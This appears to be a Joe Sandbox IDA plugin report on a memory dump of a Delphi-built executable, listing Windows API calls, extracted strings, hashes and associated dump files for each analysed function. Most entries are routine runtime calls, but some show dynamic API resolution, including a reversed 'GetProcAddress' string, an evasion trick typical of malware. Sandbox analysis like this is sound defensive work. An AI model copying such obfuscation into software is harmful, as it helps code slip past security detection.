                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02ECD29D
                                                                                                                  • Part of subcall function 02ECD268: GetProcAddress.KERNEL32(00000000), ref: 02ECD281
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                • API String ID: 1646373207-1918263038
                                                                                                                • Opcode ID: 46720d6af40eb80de5c160c542ad644d69e9570e176cdf667edc487220a61c79
                                                                                                                • Instruction ID: 9c9d37ce4db481b5e8c6673ce17d66fc8906e70acd30d52185f0f38d7a04d169
                                                                                                                • Opcode Fuzzy Hash: 46720d6af40eb80de5c160c542ad644d69e9570e176cdf667edc487220a61c79
                                                                                                                • Instruction Fuzzy Hash: DF41C1A59C820C5A51086AED7F0242BF7DED6556503B0F52EB808CB744DA72FD53CE29
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02ED6EDE
                                                                                                                • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02ED6EEF
                                                                                                                • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02ED6EFF
                                                                                                                • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02ED6F0F
                                                                                                                • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02ED6F1F
                                                                                                                • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02ED6F2F
                                                                                                                • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02ED6F3F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                • API String ID: 667068680-2233174745
                                                                                                                • Opcode ID: 4319cb374ddee86273b1deb78aa873f000f4289aadd785d17c1488d393b5a4c0
                                                                                                                • Instruction ID: d7a3ac83bb7069b9445ef5e3f5b986359360f40927b63ff30a4574e71e3596f3
                                                                                                                • Opcode Fuzzy Hash: 4319cb374ddee86273b1deb78aa873f000f4289aadd785d17c1488d393b5a4c0
                                                                                                                • Instruction Fuzzy Hash: 0DF0ACE0AC8740BDFE00BFB36D81827375EAA60658364FC1DB80B6D542F775A4528F11
                                                                                                                APIs
                                                                                                                • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02EC28CE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                 • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message
                                                                                                                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                • API String ID: 2030045667-32948583
                                                                                                                • Opcode ID: 27dcca4c3c1b1a3478bab3c3faa187139dcaff77ccc975ced24ed4bc3c3544e0
                                                                                                                • Instruction ID: 88ac25db3d28971cd3ac5741b2c2bb74fbec2cf9325552298489857f5fff2320
                                                                                                                • Opcode Fuzzy Hash: 27dcca4c3c1b1a3478bab3c3faa187139dcaff77ccc975ced24ed4bc3c3544e0
                                                                                                                • Instruction Fuzzy Hash: 3DA10730A443548BDB21AAACCD84BD976E5EB09314F20A0E9EE499B341CF758987CF51
                                                                                                                Strings
                                                                                                                • An unexpected memory leak has occurred. , xrefs: 02EC2690
                                                                                                                • bytes: , xrefs: 02EC275D
                                                                                                                • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02EC2849
                                                                                                                • , xrefs: 02EC2814
                                                                                                                • 7, xrefs: 02EC26A1
                                                                                                                • The unexpected small block leaks are:, xrefs: 02EC2707
                                                                                                                • Unexpected Memory Leak, xrefs: 02EC28C0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                • API String ID: 0-2723507874
                                                                                                                • Opcode ID: 428a3959e45dfdb0197953dc4dda211ac269b4507dd19fa3c36384745f392b78
                                                                                                                • Instruction ID: 984e3f64be079c3514f6eeb46a762bde58b1523fef90d48983d6113e8974c60f
                                                                                                                • Opcode Fuzzy Hash: 428a3959e45dfdb0197953dc4dda211ac269b4507dd19fa3c36384745f392b78
                                                                                                                • Instruction Fuzzy Hash: 4C71E630A442588FDF21EAACCD84BD8BAE5EB09314F20A0E9EA49D7241CF7549C7CF51
                                                                                                                APIs
                                                                                                                • GetThreadLocale.KERNEL32(00000000,02ECC08B,?,?,00000000,00000000), ref: 02ECBDF6
                                                                                                                  • Part of subcall function 02ECA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02ECA7E2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Locale$InfoThread
                                                                                                                • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                • API String ID: 4232894706-2493093252
                                                                                                                • Opcode ID: 2165ec06cf5f8b9d097ee38797d69c31230116c9f0f46855b2f16e57d8b7f483
                                                                                                                • Instruction ID: 72bc1ad72a4fa82e8610b6e712c01ad810121d4ace961ca66cd89280387bfa45
                                                                                                                • Opcode Fuzzy Hash: 2165ec06cf5f8b9d097ee38797d69c31230116c9f0f46855b2f16e57d8b7f483
                                                                                                                • Instruction Fuzzy Hash: C6612D74A801485BDB00EBE4DA61A9FB7BBAB89304F70F43DB1019B785CA39D917CB51
                                                                                                                APIs
                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 02EDB000
                                                                                                                • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02EDB017
                                                                                                                • IsBadReadPtr.KERNEL32(?,00000004), ref: 02EDB0AB
                                                                                                                • IsBadReadPtr.KERNEL32(?,00000002), ref: 02EDB0B7
                                                                                                                • IsBadReadPtr.KERNEL32(?,00000014), ref: 02EDB0CB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Read$HandleModule
                                                                                                                • String ID: KernelBase$LoadLibraryExA
                                                                                                                • API String ID: 2226866862-113032527
                                                                                                                • Opcode ID: 3aa675054f5ace751513ee02b93874a79e9c97d5a1192fe11213c63fd25eb66b
                                                                                                                • Instruction ID: 03047db4ae67e66c6b3e99b18548a1dcf9651a25e039249c49b4ed95e6294d14
                                                                                                                • Opcode Fuzzy Hash: 3aa675054f5ace751513ee02b93874a79e9c97d5a1192fe11213c63fd25eb66b
                                                                                                                • Instruction Fuzzy Hash: 32318471680305FBDB20DBA9CC85F5A77A8AF0535CF41D118FA549B2C0E371A902CB60
                                                                                                                APIs
                                                                                                                • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02EC4423,?,?,02F467C8,?,?,02EEE7A8,02EC65B1,02EED30D), ref: 02EC4395
                                                                                                                • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02EC4423,?,?,02F467C8,?,?,02EEE7A8,02EC65B1,02EED30D), ref: 02EC439B
                                                                                                                • GetStdHandle.KERNEL32(000000F5,02EC43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02EC4423,?,?,02F467C8), ref: 02EC43B0
                                                                                                                • WriteFile.KERNEL32(00000000,000000F5,02EC43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02EC4423,?,?), ref: 02EC43B6
                                                                                                                • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02EC43D4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleWrite$Message
                                                                                                                • String ID: Error$Runtime error at 00000000
                                                                                                                • API String ID: 1570097196-2970929446
                                                                                                                • Opcode ID: c63bc60d2f54281a9bbd1464ccb0d1adcd4f7a11b3b6b2409bfcd9aca4990ef0
                                                                                                                • Instruction ID: 0c15e8128244205480b2bab8bd9d85314b1d83e9430c077cbb14ea22eb53b5b2
                                                                                                                • Opcode Fuzzy Hash: c63bc60d2f54281a9bbd1464ccb0d1adcd4f7a11b3b6b2409bfcd9aca4990ef0
                                                                                                                • Instruction Fuzzy Hash: 8FF02464AC430479FB10B2E86E06F59379C1784F79F34EA0DB725AC0C287E880D68B32
                                                                                                                APIs
                                                                                                                  • Part of subcall function 02ECAD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02ECAD59
                                                                                                                  • Part of subcall function 02ECAD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02ECAD7D
                                                                                                                  • Part of subcall function 02ECAD3C: GetModuleFileNameA.KERNEL32(02EC0000,?,00000105), ref: 02ECAD98
                                                                                                                  • Part of subcall function 02ECAD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02ECAE2E
                                                                                                                • CharToOemA.USER32(?,?), ref: 02ECAEFB
                                                                                                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02ECAF18
                                                                                                                • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02ECAF1E
                                                                                                                • GetStdHandle.KERNEL32(000000F4,02ECAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02ECAF33
                                                                                                                • WriteFile.KERNEL32(00000000,000000F4,02ECAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02ECAF39
                                                                                                                • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02ECAF5B
                                                                                                                • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02ECAF71
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 185507032-0
                                                                                                                • Opcode ID: c04780ac3ef6eb8cad2fa1810443eaeda3b105791c899744b6ed528d45fc2182
                                                                                                                • Instruction ID: 859750dfbe070f0f36c87b7eb6f48f85da7785605a66cd7f9a46dfdcc4d6f3e8
                                                                                                                • Opcode Fuzzy Hash: c04780ac3ef6eb8cad2fa1810443eaeda3b105791c899744b6ed528d45fc2182
                                                                                                                • Instruction Fuzzy Hash: A61194B25843086AD300FBD4CE40F9F77ED5B41700F60993DBB44D61E0DA74E5518B62
                                                                                                                APIs
                                                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02ECE625
                                                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02ECE641
                                                                                                                • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02ECE67A
                                                                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02ECE6F7
                                                                                                                • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02ECE710
                                                                                                                • VariantCopy.OLEAUT32(?,00000000), ref: 02ECE745
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 351091851-0
                                                                                                                • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                • Instruction ID: 507ef0da76867e74d3284492307fd41fbf420d5dc3a7631cfb26f966c1271348
                                                                                                                • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                • Instruction Fuzzy Hash: A651107595162D9BCB26DF98CE80BD9B3BDAF49314F1491E9F508E7201D630AF828F60
                                                                                                                APIs
                                                                                                                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02EC35BA
                                                                                                                • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02EC3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02EC35ED
                                                                                                                • RegCloseKey.ADVAPI32(?,02EC3610,00000000,?,00000004,00000000,02EC3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02EC3603
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                • API String ID: 3677997916-4173385793
                                                                                                                • Opcode ID: 85a3cdf82bc2f67922a995cd151f52c66e029a7058c07b591629ca02c1f791bd
                                                                                                                • Instruction ID: eb21683d4c0f201778fa253aea498386c1cabe3d9b14c3965720e249e5919932
                                                                                                                • Opcode Fuzzy Hash: 85a3cdf82bc2f67922a995cd151f52c66e029a7058c07b591629ca02c1f791bd
                                                                                                                • Instruction Fuzzy Hash: 3101F9759C0208FAEB10EBD08E02BB973ECD708710F6084A5BA04D6780E2749911DA59
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
                                                                                                                • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: Kernel32$sserddAcorPteG
                                                                                                                • API String ID: 667068680-1372893251
                                                                                                                • Opcode ID: 559dcbaac8b3f0770f725224e4ce8cf92717593111961dd1ec9af284ac84a0d6
                                                                                                                • Instruction ID: e3f7751672431b2bf979270a9fbe2b6450adf2cd45e4d1c81ad897d7eef1b0ea
                                                                                                                • Opcode Fuzzy Hash: 559dcbaac8b3f0770f725224e4ce8cf92717593111961dd1ec9af284ac84a0d6
                                                                                                                • Instruction Fuzzy Hash: 34014F786C0308AFEB14FBA4DD51E6AB7FEEB49B00F61D464B804D7640DA70A902CA24
                                                                                                                APIs
                                                                                                                • GetThreadLocale.KERNEL32(?,00000000,02ECAAE7,?,?,00000000), ref: 02ECAA68
                                                                                                                  • Part of subcall function 02ECA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02ECA7E2
                                                                                                                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02ECAAE7,?,?,00000000), ref: 02ECAA98
                                                                                                                • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02ECAAA3
                                                                                                                • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02ECAAE7,?,?,00000000), ref: 02ECAAC1
                                                                                                                • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02ECAACC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                • String ID:
                                                                                                                • API String ID: 4102113445-0
                                                                                                                • Opcode ID: eb2d8ed69b50103d8b4187d33cd447c6e4246dafcb8e7366f13312f05eb70aa4
                                                                                                                • Instruction ID: 6c5c8fa04c7fb66bcc150a29b0da827eca27bf6e1939c2e5d9d0617b477e9d63
                                                                                                                • Opcode Fuzzy Hash: eb2d8ed69b50103d8b4187d33cd447c6e4246dafcb8e7366f13312f05eb70aa4
                                                                                                                • Instruction Fuzzy Hash: 080124B02C02086BFA11BFE4CF12B5B335DDB81B14F70E138F000A67C0D6648E128A24
                                                                                                                APIs
                                                                                                                • GetThreadLocale.KERNEL32(?,00000000,02ECACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02ECAB2F
                                                                                                                  • Part of subcall function 02ECA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02ECA7E2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2202835961.0000000002EC0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2203310640.0000000002EEE000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.0000000002F47000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000000.00000002.2204249486.000000000303E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2ec0000_x.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Locale$InfoThread
                                                                                                                • String ID: eeee$ggg$yyyy
                                                                                                                • API String ID: 4232894706-1253427255
                                                                                                                • Opcode ID: f1df002cbcd30247318483699630cf465292c145c8412850cea92b722ae29e82
                                                                                                                • Instruction ID: 57b43ff1018d0010ed0d984e0e21a918755cc4540e12944cbdce34c859a3f1fa
                                                                                                                • Opcode Fuzzy Hash: f1df002cbcd30247318483699630cf465292c145c8412850cea92b722ae29e82
                                                                                                                • Instruction Fuzzy Hash: 16418D7068450C4BD711AFF8CBA1AFEB2E7DB81204B34F53DA452C3384EA249D03CA25
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02ED823C,?,?,00000000,?,02ED7A7E,ntdll,00000000,00000000,02ED7AC3,?,?,00000000), ref: 02ED820A
                                                                                                                  • Part of subcall function 02ED8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02ED82FC,?,?,00000000,00000000,?,02ED8215,00000000,KernelBASE,00000000,00000000,02ED823C), ref: 02ED82C1
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02ED82C7
                                                                                                                  • Part of subcall function 02ED8274: GetProcAddress.KERNEL32(?,?), ref: 02ED82D9
                                                                                                                • GetModuleHandleA.KERNELBASE(?), ref: 02ED821E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2202985567.0000000002EC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: true
